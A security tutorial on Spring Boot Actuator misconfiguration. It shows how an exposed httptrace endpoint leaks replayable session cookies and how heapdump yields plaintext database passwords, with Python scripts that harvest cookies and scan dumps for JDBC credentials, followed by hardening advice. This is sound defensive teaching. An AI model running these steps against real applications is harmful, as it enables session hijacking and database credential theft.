This article does not describe what the Spring Boot Actuator can do in detail; it concentrates on the security problems the actuator brings with it.

1. Unauthenticated access to httptrace

httptrace records every HTTP request the application handles, including cookies, request parameters and headers. If an attacker can read the cookie of a logged-in user's request, they can present that cookie themselves and act as that user. Step 1: create a Spring Boot project and add the actuator dependency to the POM:

```xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
```

Step 2: in application.properties, expose all endpoints over the web. By default only health is exposed (Spring Boot 2.x also exposes info), so the dangerous endpoints discussed below are reachable only because of this one line:

```properties
management.endpoints.web.exposure.include=*
```

Step 3: register an HttpTraceRepository bean, the store that the httptrace endpoint reads from. Since Spring Boot 2.2 no repository is auto-configured, so without this bean the httptrace endpoint is not created even when it is included in the exposure list:

```java
import org.springframework.boot.actuate.trace.http.HttpTraceRepository;
import org.springframework.boot.actuate.trace.http.InMemoryHttpTraceRepository;
import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

@Configuration
public class APPConfig {
    @Bean
    @ConditionalOnMissingBean(HttpTraceRepository.class)
    public HttpTraceRepository traceRepository() { // backs /actuator/httptrace
        return new InMemoryHttpTraceRepository(); // default capacity: the last 100 exchanges
    }
}
```

Start the application and open http://127.0.0.1:9999/actuator/ to list the exposed endpoints (the demo runs on port 9999).

Then open http://127.0.0.1:9999/actuator/httptrace and look at what the trace records.



If one of the recorded cookies is a user's login session cookie, anyone who can read this endpoint can replay it and do anything that user can do.
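As an added example (not code from the article), the following Python script parses a constructed /actuator/httptrace response in the Spring Boot 2.x format and pulls out exactly what an attacker wants from it: Cookie headers on requests, Set-Cookie headers on login responses, and Authorization headers. Cookies are recorded by default; the Authorization header is recorded only when the operator extends management.trace.http.include to cover it, so the script checks for it without relying on it. The URLs, session IDs and the Basic credential in the sample are constructed.

```python
import json

# Constructed sample of an /actuator/httptrace response (Spring Boot 2.x shape);
# not captured from a real system.
SAMPLE_HTTPTRACE = json.dumps({
    "traces": [
        {
            "timestamp": "2021-03-01T09:15:22.123Z",
            "request": {
                "method": "GET",
                "uri": "http://127.0.0.1:9999/api/account",
                "headers": {
                    "host": ["127.0.0.1:9999"],
                    "cookie": ["JSESSIONID=5E1F2A3B4C5D; theme=dark"],
                },
                "remoteAddress": "10.0.0.25",
            },
            "response": {"status": 200, "headers": {"content-type": ["application/json"]}},
            "timeTaken": 8,
        },
        {
            "timestamp": "2021-03-01T09:15:30.456Z",
            "request": {
                "method": "POST",
                "uri": "http://127.0.0.1:9999/login",
                "headers": {"host": ["127.0.0.1:9999"],
                            "content-type": ["application/x-www-form-urlencoded"]},
            },
            "response": {
                "status": 302,
                "headers": {"set-cookie": ["JSESSIONID=9F8E7D6C5B4A; Path=/; HttpOnly"]},
            },
            "timeTaken": 41,
        },
        {
            "timestamp": "2021-03-01T09:16:02.789Z",
            "request": {
                "method": "GET",
                "uri": "http://127.0.0.1:9999/actuator/health",
                # only present if authorization-header was added to the include list
                "headers": {"host": ["127.0.0.1:9999"], "Authorization": ["Basic YWRtaW46czNjcjN0"]},
            },
            "response": {"status": 200, "headers": {}},
            "timeTaken": 3,
        },
    ]
})

SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization"}


def _headers(section):
    """Return {lowercased-name: [values]} for a request or response section.

    Header-name case depends on the servlet container, so compare case-insensitively.
    """
    return {k.lower(): v for k, v in (section or {}).get("headers", {}).items()}


def harvest_credentials(httptrace_json):
    """Collect Cookie / Set-Cookie / Authorization values from every recorded exchange.

    Returns one dict per sensitive header value, in trace order.
    """
    findings = []
    for trace in json.loads(httptrace_json).get("traces", []):
        req = trace.get("request", {})
        for side, section in (("request", req), ("response", trace.get("response"))):
            for name, values in _headers(section).items():
                if name in SENSITIVE_HEADERS:
                    for value in values:
                        findings.append({
                            "timestamp": trace.get("timestamp"),
                            "method": req.get("method"),
                            "uri": req.get("uri"),
                            "side": side,
                            "header": name,
                            "value": value,
                        })
    return findings


def session_ids(findings):
    """Extract JSESSIONID values from cookie/set-cookie findings (deduplicated, order kept)."""
    ids = []
    for f in findings:
        if f["header"] in ("cookie", "set-cookie"):
            for part in f["value"].split(";"):
                name, _, val = part.strip().partition("=")
                if name == "JSESSIONID" and val and val not in ids:
                    ids.append(val)
    return ids


if __name__ == "__main__":
    found = harvest_credentials(SAMPLE_HTTPTRACE)
    for f in found:
        print(f"{f['timestamp']} {f['method']} {f['uri']} [{f['side']} {f['header']}] {f['value']}")
    print("replayable JSESSIONIDs:", session_ids(found))
```

Against a live target the same parser is fed the body of a GET to /actuator/httptrace; each JSESSIONID it returns is a ready-made Cookie header for requests to the application, and the Set-Cookie from the login response shows that even sessions created before the attacker started watching are recoverable as long as they are still within the repository's capacity.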

2. Obtaining the database password from heapdump

Step 1: open http://127.0.0.1:9999/actuator/env to view the application's configuration.

In the JSON output, search for datasource: the database account and connection URL are visible, but the password is masked. The env endpoint sanitizes every property whose key looks sensitive (names containing password, secret, key, token, credentials and the like) and shows its value as ****** instead.

When the password cannot be read from the configuration, it can still be found in the heap. Every live Java object lives there, including the data source and its connection pool, and the pool's fields hold the plaintext password because the application needs it to open connections.

Download a dump via http://127.0.0.1:9999/actuator/heapdump (the endpoint returns an HPROF file) and analyze it with jhat. Note that jhat shipped with JDK 6 to 8 and was removed in JDK 9; on newer JDKs Eclipse MAT or VisualVM does the same job.

Open http://127.0.0.1:7000/ (jhat's default port) to browse the analysis.

On the page, use Ctrl+F to search for datasource; among the hits is the DataSourceInitializationMode class.

Click on it and follow two layers of object references to reach the data source instance; its fields hold the database account, password and URL. At this point we have recovered everything needed to connect to the database.

Of course, in a well-run company the database host is isolated from whoever holds the application's credentials: even with the correct account and password, the host is reachable only from inside the machine room, so you still cannot connect. If the database is reachable over the public network, this is a serious security breach.
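Before reaching for jhat, a quick triage of the downloaded file shows whether JDBC connection strings are in it at all. The following is an added Python example, not part of the original article: it scans a constructed byte buffer that stands in for a heap dump (real HPROF record framing is simplified) for JDBC URLs in both encodings that java.lang.String contents take in a dump: one byte per character for Latin-1 compact strings on JDK 9 and later, and two bytes per character (big-endian char[]) on JDK 8. The URLs, hosts, user name and password in the sample are constructed. The point the naive scanner makes is that a plain ASCII grep over a JDK 8 dump misses the UTF-16 form entirely.

```python
import re

# Constructed stand-in for a slice of an HPROF heap dump; not a real dump.
# The same kind of URL is embedded twice: once as a JDK 9+ compact (Latin-1)
# string and once as a JDK 8 char[] (UTF-16BE), which is how they appear on disk.
LATIN1_URL = b"jdbc:mysql://db.internal:3306/orders?useSSL=false"
UTF16_URL = "jdbc:postgresql://10.20.30.40:5432/billing?user=app&password=Tr0ub4dor".encode("utf-16-be")
SAMPLE_HEAP = (
    b"JAVA PROFILE 1.0.2\x00"          # HPROF header magic
    + b"\x00\x00\x00\x08"               # identifier size = 8 bytes
    + b"\x00" * 8                        # dump timestamp (zeroed here)
    + b"\x0c\x00\x00\x00\x00"            # HEAP_DUMP tag + time; body framing omitted
    + LATIN1_URL + b"\x00" * 6
    + b"\xe3\x81\x00\x7f" + UTF16_URL + b"\x00\x00"
    + b"com/zaxxer/hikari/HikariDataSource" + b"\x00" * 8   # class-name symbol
)

# JDBC URL in one-byte form: "jdbc:<driver>:" followed by printable ASCII.
JDBC_LATIN1 = re.compile(rb"jdbc:[a-zA-Z0-9]+:[\x21-\x7e]{4,200}")
# Same thing as UTF-16BE: every ASCII character is preceded by a zero byte.
JDBC_UTF16BE = re.compile(rb"\x00j\x00d\x00b\x00c\x00:(?:\x00[\x21-\x7e]){4,400}")


def find_jdbc_urls(heap: bytes):
    """Return [(offset, encoding, url)] for JDBC URLs found in either string encoding."""
    hits = []
    for m in JDBC_LATIN1.finditer(heap):
        hits.append((m.start(), "latin-1", m.group().decode("latin-1")))
    for m in JDBC_UTF16BE.finditer(heap):
        hits.append((m.start(), "utf-16-be", m.group().decode("utf-16-be")))
    return sorted(hits)


def credentials_in_url(url: str):
    """Pick user/password out of the URL query string (some drivers accept them there).

    Returns {} when the URL carries no credentials; then the password lives in a
    separate String object referenced from the data source and must be found by
    walking the object graph, as the jhat steps above do.
    """
    _, _, query = url.partition("?")
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    return {k: params[k] for k in ("user", "password") if k in params}


def naive_ascii_only(heap: bytes):
    """What `strings heapdump | grep jdbc:` sees: one-byte strings only."""
    return [m.group().decode("latin-1") for m in JDBC_LATIN1.finditer(heap)]


if __name__ == "__main__":
    for offset, encoding, url in find_jdbc_urls(SAMPLE_HEAP):
        print(f"0x{offset:08x} {encoding:10} {url} {credentials_in_url(url)}")
    print("ASCII-only scan found", len(naive_ascii_only(SAMPLE_HEAP)), "of",
          len(find_jdbc_urls(SAMPLE_HEAP)), "URLs")
```

On a real dump, `strings -e b heapdump | grep jdbc:` gives the UTF-16BE view that the plain `strings` run lacks. When the password is not embedded in the URL, the structured route is the one the article follows in jhat, or, in Eclipse MAT, an OQL query such as `SELECT * FROM com.zaxxer.hikari.HikariDataSource` followed by inspecting the instance's password field.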

Data security is the foundation of an enterprise, and security incidents usually arise from details like these. Security is no small matter; developers need to be careful.

There are several remedies for the problems above:

1. Configure the application itself so that only basic endpoints are exposed, such as the health check the service registry uses to detect heartbeats.
2. Require authentication for the sensitive endpoints, for example by adding Spring Security and protecting the actuator paths.
3. Filter at the software load balancer: if nginx or a similar proxy sits in front of the application, add a rule that rejects requests to the sensitive endpoint paths outright.
4. Control account security at the storage layer, for example by encrypting credentials in configuration uniformly. On its own this does not defeat the heap dump attack: the application must decrypt the password to connect, so the plaintext is still in memory, and it has to be combined with the first three measures.
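The first remedy, written out as an added configuration example (not from the original article) that puts the weak setting used in the demo beside a hardened application.properties; the management port and bind address are choices for this example:

```properties
# Before (the demo configuration above): every endpoint, including heapdump,
# env and httptrace, is served on the application port to anyone who can reach it.
# management.endpoints.web.exposure.include=*

# After: expose only the health endpoint the service registry polls ...
management.endpoints.web.exposure.include=health
# ... and keep component details (database status, disk space) away from anonymous callers
management.endpoint.health.show-details=never
# Disable the endpoints that leak memory and configuration outright, so a later
# change to the include list cannot bring them back
management.endpoint.heapdump.enabled=false
management.endpoint.env.enabled=false
management.endpoint.httptrace.enabled=false
# Move whatever remains to a separate management port bound to loopback; the
# reverse proxy forwards only the application port, so /actuator is never
# reachable from outside the host
management.server.port=8081
management.server.address=127.0.0.1
```

For the second remedy, Spring Boot's `EndpointRequest.toAnyEndpoint()` request matcher lets a Spring Security configuration demand a role for all actuator paths in one rule; for the third, an nginx `location /actuator/ { deny all; }` block returns 403 before the request reaches the application. Whichever layer is used, verify it the same way the attack does: request /actuator/heapdump, /actuator/env and /actuator/httptrace from outside and confirm they no longer answer.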